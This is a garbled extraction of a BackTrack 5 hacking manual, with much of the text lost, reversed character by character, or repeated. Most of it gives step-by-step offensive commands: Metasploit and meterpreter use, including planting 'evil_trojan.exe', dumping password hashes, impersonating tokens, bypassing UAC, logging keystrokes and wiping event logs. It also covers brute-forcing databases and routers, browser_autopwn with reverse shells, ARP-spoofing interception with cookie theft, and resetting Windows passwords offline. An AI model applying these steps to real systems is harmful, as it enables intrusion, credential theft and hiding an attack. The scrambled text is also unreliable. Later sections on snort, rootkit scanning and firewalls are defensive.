author and licensing informationVulnerability (ie: CVE, BID, etc)
:msf > info dos/windows/smb/ms09_001_write
:Name: Microsoft SRV.SYS WriteAndX Invalid DataOffsetVersion: 6890License: Metasploit Framework License (BSD)Provided by:j.v.vallejo
11.set / unset:Payload .
msf auxiliary(ms09_001_write) > set RHOST 192.168.1.1RHOST => 192.168.1.1msf auxiliary(ms09_001_write) > show optionsModule options:Name Current Setting Required Description---- --------------- -------- -----------RHOST 192.168.1.1 yes The target addressRPORT 445 yes Set the SMB service port
Unset:msf > set RHOSTS 192.168.1.0/24RHOSTS => 192.168.1.0/24msf > set THREADS 50
102
THREADS => 50msf > set
:Global======Name Value---- -----RHOSTS 192.168.1.0/24THREADS 50msf > unset THREADS
:Unsetting THREADS...msf > unset all
:Flushing datastore...msf > set
:Global======No entries in data store.
12.sessions: meterpreter VNCshells... .
sessions -i .:
msf exploit(3proxy) > sessions -i 1[*] Starting interaction with 1...
13.search::
msf > search ms09-001[*] Searching loaded modules for pattern 'ms09-001'...40Auxiliary=========
103
Name Description---- ---- ----dos/windows/smb/ms09_001_write Microsoft SRV.SYS WriteAndX Invalid DataOffset
14.show: .auxiliaryexploit ....
msf > show auxiliaryAuxiliary=========Name Description---- ---- ----admin/backupexec/dump Veritas Backup Exec Windows Remote File Accessadmin/backupexec/registry Veritas Backup Exec Server Registry Accessadmin/cisco/ios_http_auth_bypass Cisco IOS HTTP Unauthorized AdministrativeAccess...snip...
msf > show exploits show encoders
msf > show payloads show nops
show options
show advanced
show targets
15.ps: .
meterpreter > ps
104
16.migrate: notpad ) (.
Ps notpad .:
pid=1540migrate to 1540
17.ls: .
meterpreter > ls18.download:
:meterpreter > download c:\\boot.ini[*] downloading: c:\boot.ini -> c:\boot.ini[*] : c:\boot.ini ->c:\boot.ini/boot.ini
19.upload:evil-trojan .
meterpreter > upload evil_trojan.exe c:\\windows\\system3220.ipconfig:
.21.execute:command.
execute -f cmd.exe -i -H22.hashdump: )user account( .
meterpreter > run post/windows/gather/hashdump[*]Obtaining the user list and keys...[*]Decrypting user keys...[*]Dumping password hashes...
Administrator:500:b512c1f3a8c0e7241aa818381e4e751b :1891f4775f676d4d10c09c1
104
16.migrate: notpad ) (.
Ps notpad .:
pid=1540migrate to 1540
17.ls: .
meterpreter > ls18.download:
:meterpreter > download c:\\boot.ini[*] downloading: c:\boot.ini -> c:\boot.ini[*] : c:\boot.ini ->c:\boot.ini/boot.ini
19.upload:evil-trojan .
meterpreter > upload evil_trojan.exe c:\\windows\\system3220.ipconfig:
.21.execute:command.
execute -f cmd.exe -i -H22.hashdump: )user account( .
meterpreter > run post/windows/gather/hashdump[*]Obtaining the user list and keys...[*]Decrypting user keys...[*]Dumping password hashes...
Administrator:500:b512c1f3a8c0e7241aa818381e4e751b :1891f4775f676d4d10c09c1
104
16.migrate: notpad ) (.
Ps notpad .:
pid=1540migrate to 1540
17.ls: .
meterpreter > ls18.download:
:meterpreter > download c:\\boot.ini[*] downloading: c:\boot.ini -> c:\boot.ini[*] : c:\boot.ini ->c:\boot.ini/boot.ini
19.upload:evil-trojan .
meterpreter > upload evil_trojan.exe c:\\windows\\system3220.ipconfig:
.21.execute:command.
execute -f cmd.exe -i -H22.hashdump: )user account( .
meterpreter > run post/windows/gather/hashdump[*]Obtaining the user list and keys...[*]Decrypting user keys...[*]Dumping password hashes...
Administrator:500:b512c1f3a8c0e7241aa818381e4e751b :1891f4775f676d4d10c09c1
105
225a5c0a3:::dook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbda e13ed5abd30ac94ddeb3cf52d:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe 0d16ae931b73c59d7e0c089c0:::
Metasploitable MySQL: metasploit meta MYSQL
. :
(. ( metasploit. (word-list attack .1( :
msfconsole2( :
search MySQL
106
3( brute-force sql:use auxiliary/scanner/mysql/mysql_login
4( :show options
5( :set RHOSTS 192.168.10.111
6( word-list-user :set user_file /root/Desktop/usernames.txt
7( word-list-password :set pass_file /root/Desktop/passwords.txt
107
8( :exploit
: + user password .
Metasploitable Postgresql: )metasploit MySQL ( . .
:set RHOSTS 192.168.10.111set user_file /opt/metasploit/msf3/data/wordlists/postgres_default_user.txtset pass_file /opt/metasploit/msf3/data/wordlists/postgres_default_user.txtexploit
108
901
:eludom nwpotua_resworb eht gnitnemelpmI
..
: elosnocfsmnwpotua hcraes
nwpotua_resworb/revres/yrailixua esu:
pct_esrever/reterpretem/swodniw daolyap tessnoitpo wohs
011
. sserdda pi= TSOHL901.01.861.291 TSOHL tes
. sserdda pi . "sepytelif" HTAPIRU tes
tiolpxe: TSOHL sserdda pi
.0808:]sserddA PI dedivorP[//:ptth sserdda PI eht ta tiolpxe eht strats tiolpsateM .sserdda pi
. noisses :
. : 1 i- noissesplehtrats_nacsyekpmud_nacsyek
.... tacmoT elbatiolpsateM. - : 1 . FPD elbatiolpsateM : 2
111
3 : Wifi Hacking :KarmetasploitIn Action
:http://www.offensive-security.com/me...loit_In_Actionhttp://www.backtrack-linux.org/forum...hp?t=21492#topwww.hackingdna.comhttp://wirelessdefence.org/Contents/karmetasploit.htmhttps://www.google.com/#q=tutorial+metasploithttp://www.offensive-security.com/metasploit-unleashed/Attack_Analysishttp://searchsecurity.techtarget.in/tip/BackTrack-5-tutorial-Part-I-Information-gathering-and-VA-toolshttp://www.offensive-security.com/metasploit-unleashed/Msfconsole_Commandshttp://www.offensive-security.com/metasploit-unleashed/Meterpreter_Basicshttp://en.wikibooks.org/wiki/Metasploit/MeterpreterClienthttp://sectools.org/tag/sploits/Metasploitable Tomcat:http://www.rapid7.com/db/modules/exp...cat_mgr_deployhttp://www.rapid7.com/db/modules/aux...mcat_mgr_loginhttp://www.securitygeeks.net/2013/05...he-tomcat.htmlhttp://www.offensive-security.com/me...n_HTTP_Moduleswww.youtube.com/watch?v=o8_qLxPW--swww.youtube.com/watch?v=0-ue2_q_9oUMetasploitable PDF:http://www.offensive-security.com/me..._Side_Exploitshttp://www.offensive-security.com/me...rting_Exploitshttp://www.exploit-db.com/exploits/14681/http://blog.g0tmi1k.com/2011/03/vide...dobe-pdfs.htmlhttps://community.rapid7.com/thread/2742http://www.rapid7.com/db/modules/exp...f_embedded_exe
112
Karmetasploit In Action :http://www.offensive-security.com/me...loit_In_Actionhttp://www.backtrack-linux.org/forum...hp?t=21492#tophttp://wirelessdefence.org/Contents/karmetasploit.htmWeb explotion tools:http://www.blackhatlibrary.net/Category:Web_exploitationhttp://www.dotslashbacktrack.com/web-exploitation-tools.htmlhttp://www.aldeid.com/wiki/Websecurifyhttp://www.aldeid.com/wiki/W3AFhttp://searchsecurity.techtarget.in/tip/A-Web-exploit-toolkit-reference-guide-for-BackTrack-5http://www.aldeid.com/wiki/Category:Backtrack/GUI/Exploitation-Tools/Web-Exploitation-Tools
311
noitalacsE egelivirP
. :snekot noitanosrepmi gnisU
.
5 . reterpretem noisses
: (11 i- snoisses
:reterpretem (2otingocni esu
: (3pleh
114
4( :list_tokens -u
5( :impersonate_token \\test-pc\willie
:impersonate_token [name of the account to impersonate]
Local privilege escalation attack: :
1. :
2. :getsystem -hgetsystem
: win7 UAC(user access control) :run post/windows/escalate/bypassuac
115
Mastering the Social-Engineer Toolkit (SET): framework .1( set:
cd /pentest/exploits/set :
Applications | BackTrack | Exploitation Tools | Social Engineering Tools | Social EngineeringToolkit | set.
2( :./set
3( :y enter.
4( set :Social-Engineering Attacks.Fast-Track Penetration Testing.Third Party Modules.Update the Metasploit Framework
116
.Update the Social-Engineer Toolkit
.Update SET configuration
.Help, Credits, and About
.Exit the Social-Engineer Toolkit
:1( "social engineering attack" 1 .2( Create a Payload and Listener:
4
711
(: noitcennoc esrever) pi (3901.01.861.291
: daolyap (4reterpreteM PCT_esreveR swodniW:
2 ssapyb gnidocnE (5
. )TSEB( elbatucexE deroodkcaB: 61 . (6
reldnah (7.reldnah tiolpxe elgoog .
. :
811
:atad 'smitciv gnitcelloC: .
:
: trats_nacsyek
:pmud_nacsyek
.: :
119
Cleaning up the tracks: .
:sessions -i 1
:irib
:log = client.sys.eventlog.open('system')log = client.sys.eventlog.open('security')log = client.sys.eventlog.open('application')log = client.sys.eventlog.open('directory service')log = client.sys.eventlog.open('dns server')log = client.sys.eventlog.open('file replication service')
021
: raelc.gol
:)MTIM( kcatta elddim-eht-ni-naM.
: (1G pacrette
121
2(:Sniff | Unified sniffing
3( :
4(:Hosts | Scan for hosts
5(:Hosts| Hosts list
221
. 1 tegrat ot dda 1 tegrat dda 211.01.861.291:
:(6gniffins tratS | tratS
: pra (gninosiop prA | mtiM
321
:(8snoitcennoc etomer ffinS
: (9
421
: (01gniffins potS | tratS
.
:noitalupinam ciffart LRU foopspra pra
. . selbat-pi
: drawrof_pi/4vpi/ten/sys/corp/ >> 1 ohce odusdrawrof_pi/4vpi/ten/sys/corp/ > tac
. 511.01.861.291 pi 7niw :
. i-( kcabpool=oL __ tenrehtE=hte __ sseleriw=nalw
. t-( 1.01.861.291 511.01.861.291 t- 0nalw i foopspra odus
: .]sserdda PI noitanitsed[ ]sserdda PI tegrat[ t ]ecafretni[ i foopspra
.011.01.861.291: pi. pi yawateg 011.01.861.291 1.01.861.291 t- 0nalw i foopspra odus
521
:noitcerider troP .
. 0808 08 . gnippam tropgnidrawrof trop noitcerider trop
: drawrof_pi/4vpi/ten/sys/corp/ >> 1 ohce oduS
. 1.01.861.291 pi ( )yawetag_ 1.01.861.291 0nalw i foopspra odus
: .]sserdda PI noitanitsed[ ]ecafretni[ i foopspra
. 011.01.861.291: pi
: 0808 trop-ot-- TCERIDER j- 08 trop-noitanitsed-- pct p- GNITUORERP A- tan t- selbatpi
( ffins) .
:seikooc gnilaets yb liam-e na gnisseccA
. -ysaE , pirtsLRU , pirtsLSS , pacrettE: . tpyrcne
. sdeerc-ysae . . . . . sdeerC: (1
621
: (2hs.sderc-ysae/.
. 2
: 2
721
. :gninosioP PRA yawenO 3 (3
: (40nalw: : (5
sdeerc-ysae/sreffins/tsetnep sderC-ysaE/toor/: :
n"esu ot smitciv fo elif detalupop a evah uoy oD": (6:
1.01.861.291: yawetag pi (
n: "kcatta gnikcajedis a edulcni ot ekil uoy dluoW" (
: (9
128
10( ettercap . easey-creeds .
:http://en.wikipedia.org/wiki/Man-in-...e_of_an_attackhttp://openmaniak.com/ettercap_filter.phpcain & caabl:http://www.irongeek.com/i.php?page=v...-arp-poisoningcain & cabl:http://www.hacking-tutorial.com/hack...middle-attack/
:http://www.chmag.in/article/jun2012/mitm-ettercaphttp://www.tech-juice.org/2011/06/20...with-ettercap/
http://www.offensive-security.com/metasploit-unleashed/Event_Log_Management
129
https://pypi.python.org/pypi/sslstrip/0.9.2http://www.backtrack-linux.org/forums/showthread.php?t=20272http://seclist.us/2013/01/update-easy-creeds-v-3-7-3-linux-bash-script-for-mitm-attacks.html
:www.youtube.com/watch?v=RfHfmeaYcy0www.youtube.com/watch?v=rw_b__wiSWMwww.youtube.com/watch?v=EMTzBfbU808
031
gnikcarC drowssaP
. :skcattA PTTH dna drowssaP enilnO
, SM ,SPTTH , PTTH , PTF ardyH. ardyH-CHT . ..., ocsiC , CNV , lqsYM
: ardyh (1ktg-ardyh | skcattA enilnO | skcattA drowssaP | noitalacsE egelivirP | kcarTkcaB | snoitacilppA
131
2( :/pentest/web/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/names/nameslist.txt/pentest/web/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/passwds/john.txt
: .
3( )tab (target ip :192.168.10.111
231
: (4. ksat fo rebmun :
: trats trats (5
331
:ssecca retuor gniniaG. ecrof-eturb : .1
asudem | skcattA enilnO | skcattA drowssaP | noitalacsE egelivirP | kcarTkcaB | snoitacilppA
: .2n- sn e- tsl.ed0ckrad/stsildrow/sdrowssap/tsetnep/ P- nimda u- 1.01.861.291 h- ptth M- asudem
F- 08
. ptth :M-. pi:h-.nimda :u-. :p-. :e-. :F-
134
-n: . Medusa :
AFP ,CVS ,FTP ,HTTP ,IMAP ,MS SQL ,MySQL ,NetWare ,NNTP ,POP3 ,Postgresql ,REXEC,RLOGIN ,RSH ,SMBNT ,SMTP AUTH ,SMTP VRFY ,SNMP ,SSHv2 ,Subversion ,Telnet ,VMware authentication ,VNC ,www
Password profiling:
.1( meta:
msfconsole2( email :
search email collector
3( :use auxiliary/gather/search_email_collector
4( :show options
531
: (5. : :
moc.evitcepsrepseilliwmorf niamod tes
. . (6txt.eilliwmorf/potkseD/toor/ eliftuo tes
: (7nur
. (8:reppiR eht nhoJ gnisu drowssap swodniW a gnikcarC
. MAS hsah nhoj BSU (. kcatta ssecca lacisyhP)
ecrof-eturb nhoj . MOR_DVD/DC .
: (1l- ksidF
631
: (2/tegrat/ 1ads/ved/ tnuom
: MAS (3gifnoc/23metsys/swodniw/tegrat/ dc
: (4la- sl
: (5txt.hsah/sehsah/toor/ > MAS metsys 2pmudmas
: reppir nhoj (6rtj/sdrowssap/tsetnep/ dc
: (7txt.hsah/sehsah/toor/ nhoj./
: SFTN (8tn:f-txt.hsah/sehsah/toor/ nhoj/.
:skcatta yranoitcid gnisU.
: (1etadpu teg-tpa
: (2hcnurc llatsni teg-tpa
: (3hcnurc/sdrowssap/tsetnep/
731
: (4]snoitpo[ ]tes retcarahc[ ]htgnel mumixam[ ]htgnel muminim[ hcnurcsnoitpo
. :o-BK , BM , BG: : b-^ , % , @: . :l-( : 01 8 ) (5
o- 9876543210gfedcbaGFEDCBA 01 8 hcnurc/hcnurc/sdrowssap/tsetnep/txt.hcnurCdetareneg/potkseD/toor/
: (6txt.hcnurCdetareneg/potkseD/toor/ onan
. :
:skcatta ssecca lacisyhP kcarCUS
. : noitpo . : pleh--
. : l-. 3 : s-
138
-a : ANSI .-w : multithread .1. crunch .
sucrack /pentest/passwords/wordlists/rockyou.txt2. 6 ANSI .
sucrack -w 2 -s 6 -a /pentest/passwords/wordlists/rockyou.txt
:http://www.remote-exploit.org/articles/misc_research__amp_code/index.htmlhttp://www.securityfocus.com/tools/category/11http://www.breaknenter.org/http://www.breaknenter.org/projects/inception/Using rainbow tables:www.youtube.com/watch?v=yVlX8lh967Mwww.youtube.com/watch?v=X1krdBR_RRohttp://null-byte.wonderhowto.com/how-to/rainbow-tables-create-use-them-crack-passwords-0131470/http://renderlab.net/projects/WPA-tables/http://xiaopan.co/forums/threads/wpa-wpa2-psk-rainbow-tables-33gb.440/Using ATI Stream:www.youtube.com/watch?v=TeqN8BM9A30http://www.backtrack-linux.org/forums/showthread.php?t=41531http://www.offensive-security.com/backtrack/cuda-and-ati-stream-backtrack/https://sites.google.com/site/nozyczek/home/wardriving/how-to-install-pyrit-with-ati-cal-support-under-backtrack-5-r1-gnome-64bithttp://www.backtrack-linux.org/wiki/index.php/Install_OpenCL
139
Using NVIDIA Compute Unified Device Architecture (CUDA):www.offensive-security.com/documentation/backtrack-4-cuda-guide.pdfwww.backtrack-linux.org/documents/BACKTRACK_CUDA_v2.0.pdfhttp://www.backtrack-linux.org/wiki/index.php/CUDA_On_BackTrackhttps://www.google.com/#q=+NVIDIA+Compute+Unified+Device+Architecture+on+backtrack+5Password profiling:http://www.social-engineer.org/framework/Computer_Based_Social_Engineering_Tools:_http://www.pcmag.com/article2/0,2817,2389089,00.asphttps://bechtsoudis.com/hacking/password-profiling-mask-attacks/http://my.safaribooksonline.com/book/-/9781849517386/9dot-password-cracking/ch09s05_html
041
scisneroF kcarTkcaB(:trons)
noisurtni) . (SDI( )metsys noitceted
. . tronS
. : trons eluR (1
selur/trats/gro.trons//:ptth.pungis/gro.trons.www//:sptth
: (2
141
: noitpO . trons :q-. "edom reffins" PI/PCT :v-fnoc.trons/trons/cte/: :c-. :i-: (3
fnoc.trons/trons/cte/ c- 1hte i- v- q- trons
.x+lrtc (4. trons :
: .1fnoc.trons etacol
: .2fnoc.trons/trons/cte/ onan
241
."yna TEN_EMOH rav": . .3.
: pI 01.01.861.291 TEN_EMOH rav: pi ( 42/0.01.861.291 TEN_EMOH rav: pi ( 42/0.2.0.01,42/0.01.861.291 TEN_EMOH rav: pi (
: 42/0.01.861.291 TEN_EMOH rav
. .4.
:
143
: Comment :# :
#var EXTERNAL_NET anyvar External_NET !$HOME_NET
pdf :www.snort.org/assets/166/snort_manual.pdf
Recursive directory encryption/decryption:encryption .decryption . gpgdir dec enc .
1(:mkdir /sourcecodecd /sourcecode
2( :wget http://cipherdyne.org/gpgdir/download/gpgdir- 1.9.5.tar.bz2
3( :wget http://cipherdyne.org/gpgdir/download/gpgdir- 1.9.5.tar.bz2.asc
144
4( :gpg --import public_keygpg --verify gpgdir-1.9.5.tar.bz2.asc
5( :tar xfj gpgdir-1.9.5.tar.bz2cd gpgdir-1.9.5./install.pl
6( :gpgdir
./ gpgdir
541
: (7crridgpg./toor/ iv
. yek_tluafed :
. :
: .1yrotcerid_detpyrcne/ ridkm
. tpyrcne .2: .3
yrotcerid_detpyrcne/ e- ridgpg
. .4: .5
641
: tpyrcne : yrotcerid_detpyrcne/ d- ridgpg
: ./scod/ridgpg/gro.enydrehpic//:ptth
:stiktoor fo sngis rof gninnacS . -
. . tiktoorkcehc
: :tiktoorkhc | slooT scisneroF suriV-itnA | scisneroF | kcarTkcaB | snoitacilppA
: tiktoorkhc/scisnerof/tsetnep/ dctiktoorkhc/.
.
741
. retnuhkrstiktoor : .1
kcehc-- retnuhkr: .2
841
: tiktoorkhc . :h-. :V-. : l-
: retnuhkr : (1
etadpu-- retnuhkr: (2
tsil-- retnuhkr(:piks ) (3
ks-- kcehc-- retnuhkr:ecruos citamelborp a morf atad gnirevoceR
kcabtaf . BSU : . : (1
l- ksidf. 1bds/ved/ :
: (2kcabtaf/ ridkmselifevirdbmuht/kcabtaf/ ridkm
941
: (3kcabtaf/ dc
: (4kcabtaf | slooT gnivraC cisneroF | scisneroF | kcarTkcaB | snoitacilppA
: (5
: . kcabtaf:a-selifevirdbmuht/kcabtaf/: .... :o-
051
1bds/ved/: : (6
a- selifevirdbmuht/kcabtaf/ o- 1bds/ved/ kcabtaf:
slselifevirdbmuht dcsl
. :
: gnivraC_eliF/ikiw/gro.ikiwscisnerof.www//:ptth
:drowssap swodniW a gniveirteR. kcarchpO
: (1.php.selbat/ten.egrofecruos.kcarchpo//:ptth
: elbat (2
151
3( ophcrack tables .
4( install.5( :
Applications |BackTrack| Privilege Escalation| Password Attacks|Offline Attacks |Ophcrack-GUI
251
: daoL MAS (6
: kcarC (7
:drowssap swodniW a gnitteseR: .
. . gifnoC\23metsyS\swodniW\:C: (1
l- ksidf/tegrat/ 1ads/ved/ tnuom
:MAS (2gifnoc/23metsys/swodniw/tegrat/ dc
: (3la- sl
: (4wptnhc/sdrowssap/tsetnep/ dc
: (5MAS/gifnoc/23metsys/swodniw/tegrat/ i- wptnhc/.
351
,aera ?oD ot tahW: (6. 1
. 1 (7(. knalb drowssap) 1 (8
:seirtne yrtsiger swodniW eht ta gnikooL. .wptnhc
: (1l- ksidf/tegrat/ 1ads/ved/ tnuom
: MAS (2gifnoc/23metsys/swodniw/tegrat/ dc
: (3la- sl
: (4wptnhc/sdrowssap/tsetnep/ dc
: ( )edom evitcaretni (5gifnoc/23metsys/swodniw/tegrat/ i- wptnhc/.
aera ?oD ot tahW: (6. 9
: . (7sl
: DC (8dc.
154
:http://indonetworksecurity.com/Network%20and%20website%20security/linux/page/4chntpw:http://www.wikihow.com/Change-a-Windows-User-Password-Using-Backtrack-4http://www.quali5.asia/2013/03/convert-guest-account-into.htmlhttp://securityxploded.com/backtrackregistry.phpwww.youtube.com/watch?v=G15vPnmQ3Gkwww.youtube.com/watch?v=ukgJ-kgTjrchttp://www3.nd.edu/~dpettifo/tutorials/chntpw.htmlophcrack :www.youtube.com/watch?v=X1krdBR_RRohttp://www.rmprepusb.com/tutorials/ophcrackwww.youtube.com/watch?v=di3BIqq40bEfatback:http://indonetworksecurity.com/linux/tutorial-fatback-backtrack.htmwww.youtube.com/watch?v=0TYLq2wTr00http://www.securitytube.net/video/4245
chkrootkit:www.youtube.com/watch?v=Zqs0CXfqVfUhttp://hackingdna.com/Description.aspx?ItemHeaderId=3179E185-4F7A-4568-8DD4-B563C5F050F2http://fuzzexp.org/the-backtrack-forensics-the-howto.htmlhttp://sourceforge.net/apps/trac/rkhunter/wiki/SPRKHhttp://hackingbuzz.com/hunt-rootkits-with-rootkit-hunter-tool/snort:http://www.thegeekstuff.com/2010/08/snort-tutorial/http://security.koenig-solutions.com/1/post/2013/02/configuring-snort-in-backtrack-5-r3.html
155
http://openmaniak.com/snort_tutorial_snort.phphttp://www.linuxuser.co.uk/tutorials/protect-your-network-with-snortgpgdir :http://archive09.linux.com/feature/132999http://kerry-linux.ie/wee/cloud/wee-owncloud.php
: Port Knickong:http://cipherdyne.org/blog/categories/port-knocking-and-spa.html
651
enO xidneppA .
. selif ] zg.rat ,2pizb.rat ,piz ,rat[ tcartxe ro etaerC:
:rat emanelif rat.emanelif fvc- rat $
: zg.ratrat rat.emanelif fvx- rat $zg.rat.emanelif fzvx- rat
:piz piz.emanelif piz
: piz redlof_noitanitsed d- piz.elif piznu
: zg zg.elif piznug $
zg.elif d- pizg $
: 2zb.rat -fvx rat|2zb.rat.elif dc- 2pizb
(. ). citpanys revihcrax : : WFU
. 40.01 utnubu
157
UFW :sudo ufw enable
UFW:sudo ufw disable
:sudo ufw status verbose
:root@bt:~# ufw status verboseStatus: activeLogging: on (low)Default: deny (incoming), allow (outgoing)New profiles: skip
:sudo ufw status
:sudo ufw statusFirewall loaded
To Action From22:tcp DENY 192.168.0.122:udp DENY 192.168.0.122:tcp DENY 192.168.0.722:udp DENY 192.168.0.722:tcp ALLOW 192.168.0.0/2422:udp ALLOW 192.168.0.0/24
UFW : .
:sudo ufw allow /
158
1:sudo ufw allow 53sudo ufw allow 53/tcpsudo ufw allow 53/udp
:sudo ufw deny /
2:sudo ufw deny 53/udpsudo ufw deny 53
:sudo ufw allow from
3 : ip :sudo ufw allow from 207.46.232.182
subnet:sudo ufw allow from 192.168.1.0/24
:sudo ufw allow from to port
4 : Ip 192.168.0.4 22 :sudo ufw allow from 192.168.0.4 to any port 22
:sudo ufw allow from to port proto
5 : 22 tcp ip 192.1680.4:sudo ufw allow from 192.168.0.4 to any port 22 proto tcp
Enable/Disable ping: :
/etc/ufw/before.rules :
159
# ok icmp codes-A ufw-before-input -p icmp --icmp-type destination-unreachable -j ACCEPT-A ufw-before-input -p icmp --icmp-type source-quench -j ACCEPT-A ufw-before-input -p icmp --icmp-type time-exceeded -j ACCEPT-A ufw-before-input -p icmp --icmp-type parameter-problem -j ACCEPT-A ufw-before-input -p icmp --icmp-type echo-request -j ACCEPT
: ping ACCEPT DROP.# ok icmp codes-A ufw-before-input -p icmp --icmp-type destination-unreachable -j DROP-A ufw-before-input -p icmp --icmp-type source-quench -j DROP-A ufw-before-input -p icmp --icmp-type time-exceeded -j DROP-A ufw-before-input -p icmp --icmp-type parameter-problem -j DROP-A ufw-before-input -p icmp --icmp-type echo-request -j DROP
: :
sudo ufw status numbered :
sudo ufw delete 1
160
1 : 22 ip 192.168.0.3192.168.0.1192.168.0.7:sudo ufw status
) :(Firewall loaded
To Action From22:tcp DENY 192.168.0.122:udp DENY 192.168.0.122:tcp DENY 192.168.0.722:udp DENY 192.168.0.722:tcp ALLOW 192.168.0.0/24
) :(sudo ufw delete allow from 192.168.0.0/24 to any port 22sudo ufw statusFirewall loaded
To Action From22:tcp DENY 192.168.0.122:udp DENY 192.168.0.122:tcp DENY 192.168.0.722:udp DENY 192.168.0.7
sudo ufw deny 192.168.0.3 to any port 22sudo ufw allow 192.168.0.0/24 to any port 22 proto tcpsudo ufw statusFirewall loaded
161
To Action From22:tcp DENY 192.168.0.122:udp DENY 192.168.0.122:tcp DENY 192.168.0.722:udp DENY 192.168.0.722:tcp DENY 192.168.0.322:udp DENY 192.168.0.322:tcp ALLOW 192.168.0.0/24
:ufw deny 80/tcpsudo ufw delete deny 80/tcp
: :
less /etc/services :
sudo ufw allow sudo ufw allow sshsudo ufw deny ssh
Command in BT5-R3:1(touch:
.touch alimp5.html
2(Cat: .
3(echo: .
echo salaaam > alimp5.html
261
:pc (4.
lmth.5pmila/pmt/ lmth.5pmila pc:vm(5
. emaner tuclmth.5pmila/toor/ lmth.5pmila vMlmth.rafaj lmth.5pmila vm
: mr (6.
lmth.rafaj mr:xua sp (7
. :lliK (8
. 0851- llik
:etacoL (9.
:dniF (01.
lmth.xedni toor/ dniF:resudda (11
hedazmiza resudda:a emanu (21.
: al sl (31
361
. :dwssap (41
. :
dwssap/cte/: tac
dwssap/cte/ taC:
:bed. elif-noiatacol i- gkpd
:bed.ila/potkseD/toor/ i- gkpd
:mpr. elif-noiatacol i- mpr
: mpr.ila/potkseD/toor/ i- mpr
:exe. exe.elif-noitacol eniw
: exe.llacdiar/toor/ eniw
: ( ) . hs. :
. ( noissimrep)
461
hs.5pmila hs :
hs.5pmila 777 domhc:
hs.5pmila/.:
xobv erawmv :
: ehcapa (1
561
: (2www/rav/
: pi (3gifnocfi: pi :
661
piz.mv-tb/1.0.0.721: ehcapa : : (4
piz.mv-tb/3.1.861.291//:ptth.
. odomoC : . .
:tneilC&revreS_PCHD :
: citpanys
3pchd: . revres-3pchd tneilc-3pchd nommoc-3pchd
167
: pkgs.orgwww. ubuntu 10.04 :
dhcp3-client_3.1.3-2ubuntu3_i386.debdhcp3-common_3.1.3-2ubuntu3_i386.debdhcp3-server_3.1.3-2ubuntu3_i386.deb
(3 synaptic) ( . ( .deb :
dhcp3-commondhcp3-serverdhcp3-client
.
:http://www.proprofs.com/webschool/search.php?tag=true&search=backtrack,+hackers,+hacking,+linux,+nmap,+snort,+powerhttp://www.wikihow.com/Unzip-Files-in-Linuxhttps://help.ubuntu.com/community/UFWwww.youtube.com/watch?v=cscIe9fYKMUhttp://www.ubuntugeek.com/ufw-uncomplicated-firewall-for-ubuntu-hardy.htmlhttps://help.ubuntu.com/community/Gufwhttp://ubuntuforums.org/showthread.php?t=823741
861
owT xidneppA:
.
169
170
171
172
173